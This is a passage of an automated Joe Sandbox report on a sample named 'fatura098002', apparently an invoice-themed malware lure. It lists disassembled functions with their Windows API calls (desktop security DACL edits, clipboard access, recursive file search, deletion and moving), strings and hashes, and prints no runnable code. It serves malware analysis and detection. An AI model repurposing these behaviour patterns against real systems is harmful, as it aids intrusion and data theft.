Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$Z|
API String ID: 22674027-2860067467
Opcode ID: 54846e1cdeec572da1e64981bb43d349a55bd952cedc895699abc69bd1420438
Instruction ID: e091b97bd172c2b3f46c4c9e62a95b7f359bf8f2c536893fb7b0676a32c77ebe
Opcode Fuzzy Hash: 54846e1cdeec572da1e64981bb43d349a55bd952cedc895699abc69bd1420438
Instruction Fuzzy Hash: 98819B71900248AFDF218FA4DC49FEE7FB9EF04700F18812AFD12A61A0CB399945CB65

Function 00760B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007610F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00761114
Part of subcall function 007610F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00760B9B,?,?,?), ref: 00761120
Part of subcall function 007610F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00760B9B,?,?,?), ref: 0076112F
Part of subcall function 007610F9: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00761136
Part of subcall function 007610F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0076114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00760BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00760C00
GetLengthSid.ADVAPI32(?), ref: 00760C17
GetAce.ADVAPI32(?,00000000,?), ref: 00760C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00760C6D
GetLengthSid.ADVAPI32(?), ref: 00760C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00760C8C
RtlAllocateHeap.NTDLL(00000000), ref: 00760C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00760CB4
CopySid.ADVAPI32(00000000), ref: 00760CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00760CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00760D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00760D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00760D45
HeapFree.KERNEL32(00000000), ref: 00760D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00760D55
HeapFree.KERNEL32(00000000), ref: 00760D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00760D65
HeapFree.KERNEL32(00000000), ref: 00760D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00760D78
HeapFree.KERNEL32(00000000), ref: 00760D7F

Part of subcall function 00761193: GetProcessHeap.KERNEL32(00000008,00760BB1,?,00000000,?,00760BB1,?), ref: 007611A1
Part of subcall function 00761193: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 007611A8
Part of subcall function 00761193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00760BB1,?), ref: 007611B7

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocateDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4042927181-0
Opcode ID: dd4846010f8c237fbc13e91d2a0351a29fa501860b2caf834ba51c6cb2b60717
Instruction ID: c50aea6592514775f21f96e81fff12eff2e924226aec67e1fa1d71e0f6badb5c
Opcode Fuzzy Hash: dd4846010f8c237fbc13e91d2a0351a29fa501860b2caf834ba51c6cb2b60717
Instruction Fuzzy Hash: A2715E71A0020AAFDF11DFA4DC49BEFBBB8BF05300F048615ED15A6291D779A906CBA4

Function 0077EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0079CC08), ref: 0077EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0077EB37
GetClipboardData.USER32(0000000D), ref: 0077EB43
CloseClipboard.USER32 ref: 0077EB4F
GlobalLock.KERNEL32(00000000), ref: 0077EB87
CloseClipboard.USER32 ref: 0077EB91
GlobalUnlock.KERNEL32(00000000), ref: 0077EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0077EBC9
GetClipboardData.USER32(00000001), ref: 0077EBD1
GlobalLock.KERNEL32(00000000), ref: 0077EBE2
GlobalUnlock.KERNEL32(00000000), ref: 0077EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0077EC38
GetClipboardData.USER32(0000000F), ref: 0077EC44
GlobalLock.KERNEL32(00000000), ref: 0077EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0077EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0077EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0077ECD2
GlobalUnlock.KERNEL32(00000000), ref: 0077ECF3
CountClipboardFormats.USER32 ref: 0077ED14
CloseClipboard.USER32 ref: 0077ED59

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 9413cb6231e8259a6b6c6683c87adc58c3f871a4f654210907c29d1dbc3912b5
Instruction ID: 960a4d69a915933fde2922a5013d36d7f727826d5741638e11ff1a4aa028e8fa
Opcode Fuzzy Hash: 9413cb6231e8259a6b6c6683c87adc58c3f871a4f654210907c29d1dbc3912b5
Instruction Fuzzy Hash: 3161D474204301DFDB11EF24D889F2ABBE4AF88744F04855AF45A972E2DB39DD06CB62

Function 0079911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfilenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2

DragQueryPoint.SHELL32(?,?), ref: 00799147

Part of subcall function 00797674: ClientToScreen.USER32(?,?), ref: 0079769A
Part of subcall function 00797674: GetWindowRect.USER32(?,?), ref: 00797710
Part of subcall function 00797674: PtInRect.USER32(?,?,00798B89), ref: 00797720

SendMessageW.USER32(?,000000B0,?,?), ref: 007991B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007991BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007991DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00799225
SendMessageW.USER32(?,000000B0,?,?), ref: 0079923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00799255
SendMessageW.USER32(?,000000B1,?,?), ref: 00799277
DragFinish.SHELL32(?), ref: 0079927E
NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00799371

Strings

p#}, xrefs: 007992BB
@GUI_DROPID, xrefs: 0079929E
@GUI_DRAGFILE, xrefs: 00799320
@GUI_DRAGID, xrefs: 007992E9

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#}
API String ID: 4085959399-1593647580
Opcode ID: 04675f80f42ca6b51da58e49c0898e5bf15f02e75694c842670c63f653e29e9c
Instruction ID: 5423412cc82a2c5c772bbee2e3c424b456c80feaedfddfd82468a576110ec5e4
Opcode Fuzzy Hash: 04675f80f42ca6b51da58e49c0898e5bf15f02e75694c842670c63f653e29e9c
Instruction Fuzzy Hash: 85615D71108301EFD701DF64DC89DAFBBE8EF85750F404A1EF695921A1DB349A45CB62

Function 0077698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 007769BE
FindClose.KERNEL32(00000000), ref: 00776A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00776A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00776A75

Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00776AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00776ADF

Strings

%4d%02d%02d%02d%02d%02d%03d, xrefs: 00776B32
%03d, xrefs: 00776DA2
%4d, xrefs: 00776BB1
%4d%02d%02d%02d%02d%02d, xrefs: 00776B6A
%02d, xrefs: 00776C00, 00776C0A, 00776C5A, 00776CAA, 00776CFA, 00776D4A

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 0d1ead2a2a580832e53eeda7c1e628ee53472c4ad5a746ffcb3cbc4fef08eccd
Instruction ID: 3a84b51d95556f28570430d5d6396d254e1333a9db1c8b3c91c4715c3755c60c
Opcode Fuzzy Hash: 0d1ead2a2a580832e53eeda7c1e628ee53472c4ad5a746ffcb3cbc4fef08eccd
Instruction Fuzzy Hash: 15D131B2508340EFC714EB64C895EABB7ECAF88704F444A1DF589D7191EB78EA44C762

Function 00779642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 00779663
GetFileAttributesW.KERNEL32(?), ref: 007796A1
SetFileAttributesW.KERNEL32(?,?), ref: 007796BB
FindNextFileW.KERNEL32(00000000,?), ref: 007796D3
FindClose.KERNEL32(00000000), ref: 007796DE
FindFirstFileW.KERNEL32(*.*,?), ref: 007796FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0077974A
SetCurrentDirectoryW.KERNEL32(007C6B7C), ref: 00779768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00779772
FindClose.KERNEL32(00000000), ref: 0077977F
FindClose.KERNEL32(00000000), ref: 0077978F

Strings

*.*, xrefs: 007796F5

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: e664f0f1051dc6a23af70f3447d7c351be286cd7c67c1f02ccc8b613a0fbb1e9
Instruction ID: d9607ec1facca1690f225f3b49d93c859b719b4ea514c68d47d43b844b7c1318
Opcode Fuzzy Hash: e664f0f1051dc6a23af70f3447d7c351be286cd7c67c1f02ccc8b613a0fbb1e9
Instruction Fuzzy Hash: 9D31D572542219ABDF15EFB4EC49EDE77BCAF09360F108166FA09E2090DB3CDD418A64

Function 00798D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windownativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00798D5A
GetFocus.USER32 ref: 00798D6A
GetDlgCtrlID.USER32(00000000), ref: 00798D75
NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00798E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00798ECF
GetMenuItemCount.USER32(?), ref: 00798EEC
GetMenuItemID.USER32(?,00000000), ref: 00798EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00798F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00798F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00798FA1

Strings

0, xrefs: 00798E9F

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow
String ID: 0
API String ID: 1669892757-4108050209
Opcode ID: c4c5ae1b2acfaf24a38f2b6c97c99b86fa1061c8e0b16afc09996b1542674484
Instruction ID: 456dc8fa632b2a797d6d7bf599bca3e5dae6328016d4f95f78b4bf7037b6b62b
Opcode Fuzzy Hash: c4c5ae1b2acfaf24a38f2b6c97c99b86fa1061c8e0b16afc09996b1542674484
Instruction Fuzzy Hash: 6681E271508301AFDF51CF24E888EAB7BEAFB8A314F14051EF99597291DB38D901CB62

Function 0077979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 007797BE
FindNextFileW.KERNEL32(00000000,?), ref: 00779819
FindClose.KERNEL32(00000000), ref: 00779824
FindFirstFileW.KERNEL32(*.*,?), ref: 00779840
SetCurrentDirectoryW.KERNEL32(?), ref: 00779890
SetCurrentDirectoryW.KERNEL32(007C6B7C), ref: 007798AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 007798B8
FindClose.KERNEL32(00000000), ref: 007798C5
FindClose.KERNEL32(00000000), ref: 007798D5

Part of subcall function 0076DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0076DB00

Strings

*.*, xrefs: 0077983B

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 06e380a8440d3d394990a2897ef6c35b812df0eb7b3bcce1b054c8a8a708457a
Instruction ID: a0c6deb0b67c94467a8483de8c606cd28f2394106fc79c2c3c377961c4e7cabb
Opcode Fuzzy Hash: 06e380a8440d3d394990a2897ef6c35b812df0eb7b3bcce1b054c8a8a708457a
Instruction Fuzzy Hash: 3231E371502219AAEF10EFB4EC49EDE77BCAF06360F14C19AE918A21D0DB38DD458B65

Function 00778195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00778257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00778267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00778273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00778310
SetCurrentDirectoryW.KERNEL32(?), ref: 00778324
SetCurrentDirectoryW.KERNEL32(?), ref: 00778356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0077838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00778395

Strings

*.*, xrefs: 0077839B

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 50fcb2f05a5250479d2e146cb800c0774f9224c0827824fc67a56b9ca79d45a1
Instruction ID: 42f70a860f7affdd75cc275b9f9b7614fc0f9937904f7f1a29fe5c270ab7680e
Opcode Fuzzy Hash: 50fcb2f05a5250479d2e146cb800c0774f9224c0827824fc67a56b9ca79d45a1
Instruction Fuzzy Hash: 22615BB2504305DFCB10EF64C8489AEB3E8FF89354F04891EF99987251DB39E945CB92

Function 0076D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00703AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00703A97,?,?,00702E7F,?,?,?,00000000), ref: 00703AC2

Part of subcall function 0076E199: GetFileAttributesW.KERNEL32(?,0076CF95), ref: 0076E19A

FindFirstFileW.KERNEL32(?,?), ref: 0076D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0076D1DD
MoveFileW.KERNEL32(?,?), ref: 0076D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0076D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0076D237

Part of subcall function 0076D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0076D21C,?,?), ref: 0076D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0076D253
FindClose.KERNEL32(00000000), ref: 0076D264

Strings

\*.*, xrefs: 0076D0CD, 0076D0D6, 0076D0EB

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 1d284b9bada9065dd1cbc06f9fe9645478e38a7ddec03539b47133ade23682e0
Instruction ID: feb0ed6acf6718f90a4833e3efe23926dbf0e439ec048a7971d29ac10f7085e1
Opcode Fuzzy Hash: 1d284b9bada9065dd1cbc06f9fe9645478e38a7ddec03539b47133ade23682e0
Instruction Fuzzy Hash: CA614A31D0110DEFCF15EBA0C9969EEB7B9AF55300F248265E90277192EB386F09CB60

Function 0077ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0077ED91
EmptyClipboard.USER32 ref: 0077ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0077EDAC
CloseClipboard.USER32 ref: 0077EEA3

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 7dc2d3cbf3750d156691488532ce8d5c46f2457d0d08fce74bcfdf9caa35d8d5
Instruction ID: 14294064a2a05e0d08bbae2edd0f04780d7fdb9cd9b9b35214d9cd5aa6bc1f79
Opcode Fuzzy Hash: 7dc2d3cbf3750d156691488532ce8d5c46f2457d0d08fce74bcfdf9caa35d8d5
Instruction Fuzzy Hash: CB41A035204611EFEB21CF15D848B19BBE5FF48358F14C59AE4198B6A2C779EC42CB90

Function 00798B02 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 149nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2

Part of subcall function 0071912D: GetCursorPos.USER32(?), ref: 00719141
Part of subcall function 0071912D: ScreenToClient.USER32(00000000,?), ref: 0071915E
Part of subcall function 0071912D: GetAsyncKeyState.USER32(00000001), ref: 00719183
Part of subcall function 0071912D: GetAsyncKeyState.USER32(00000002), ref: 0071919D

ReleaseCapture.USER32 ref: 00798B77
SetWindowTextW.USER32(?,00000000), ref: 00798C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00798C25
NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00798CFF

Strings

@GUI_DROPID, xrefs: 00798C51
@GUI_DRAGFILE, xrefs: 00798C9A
p#}, xrefs: 00798C71

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
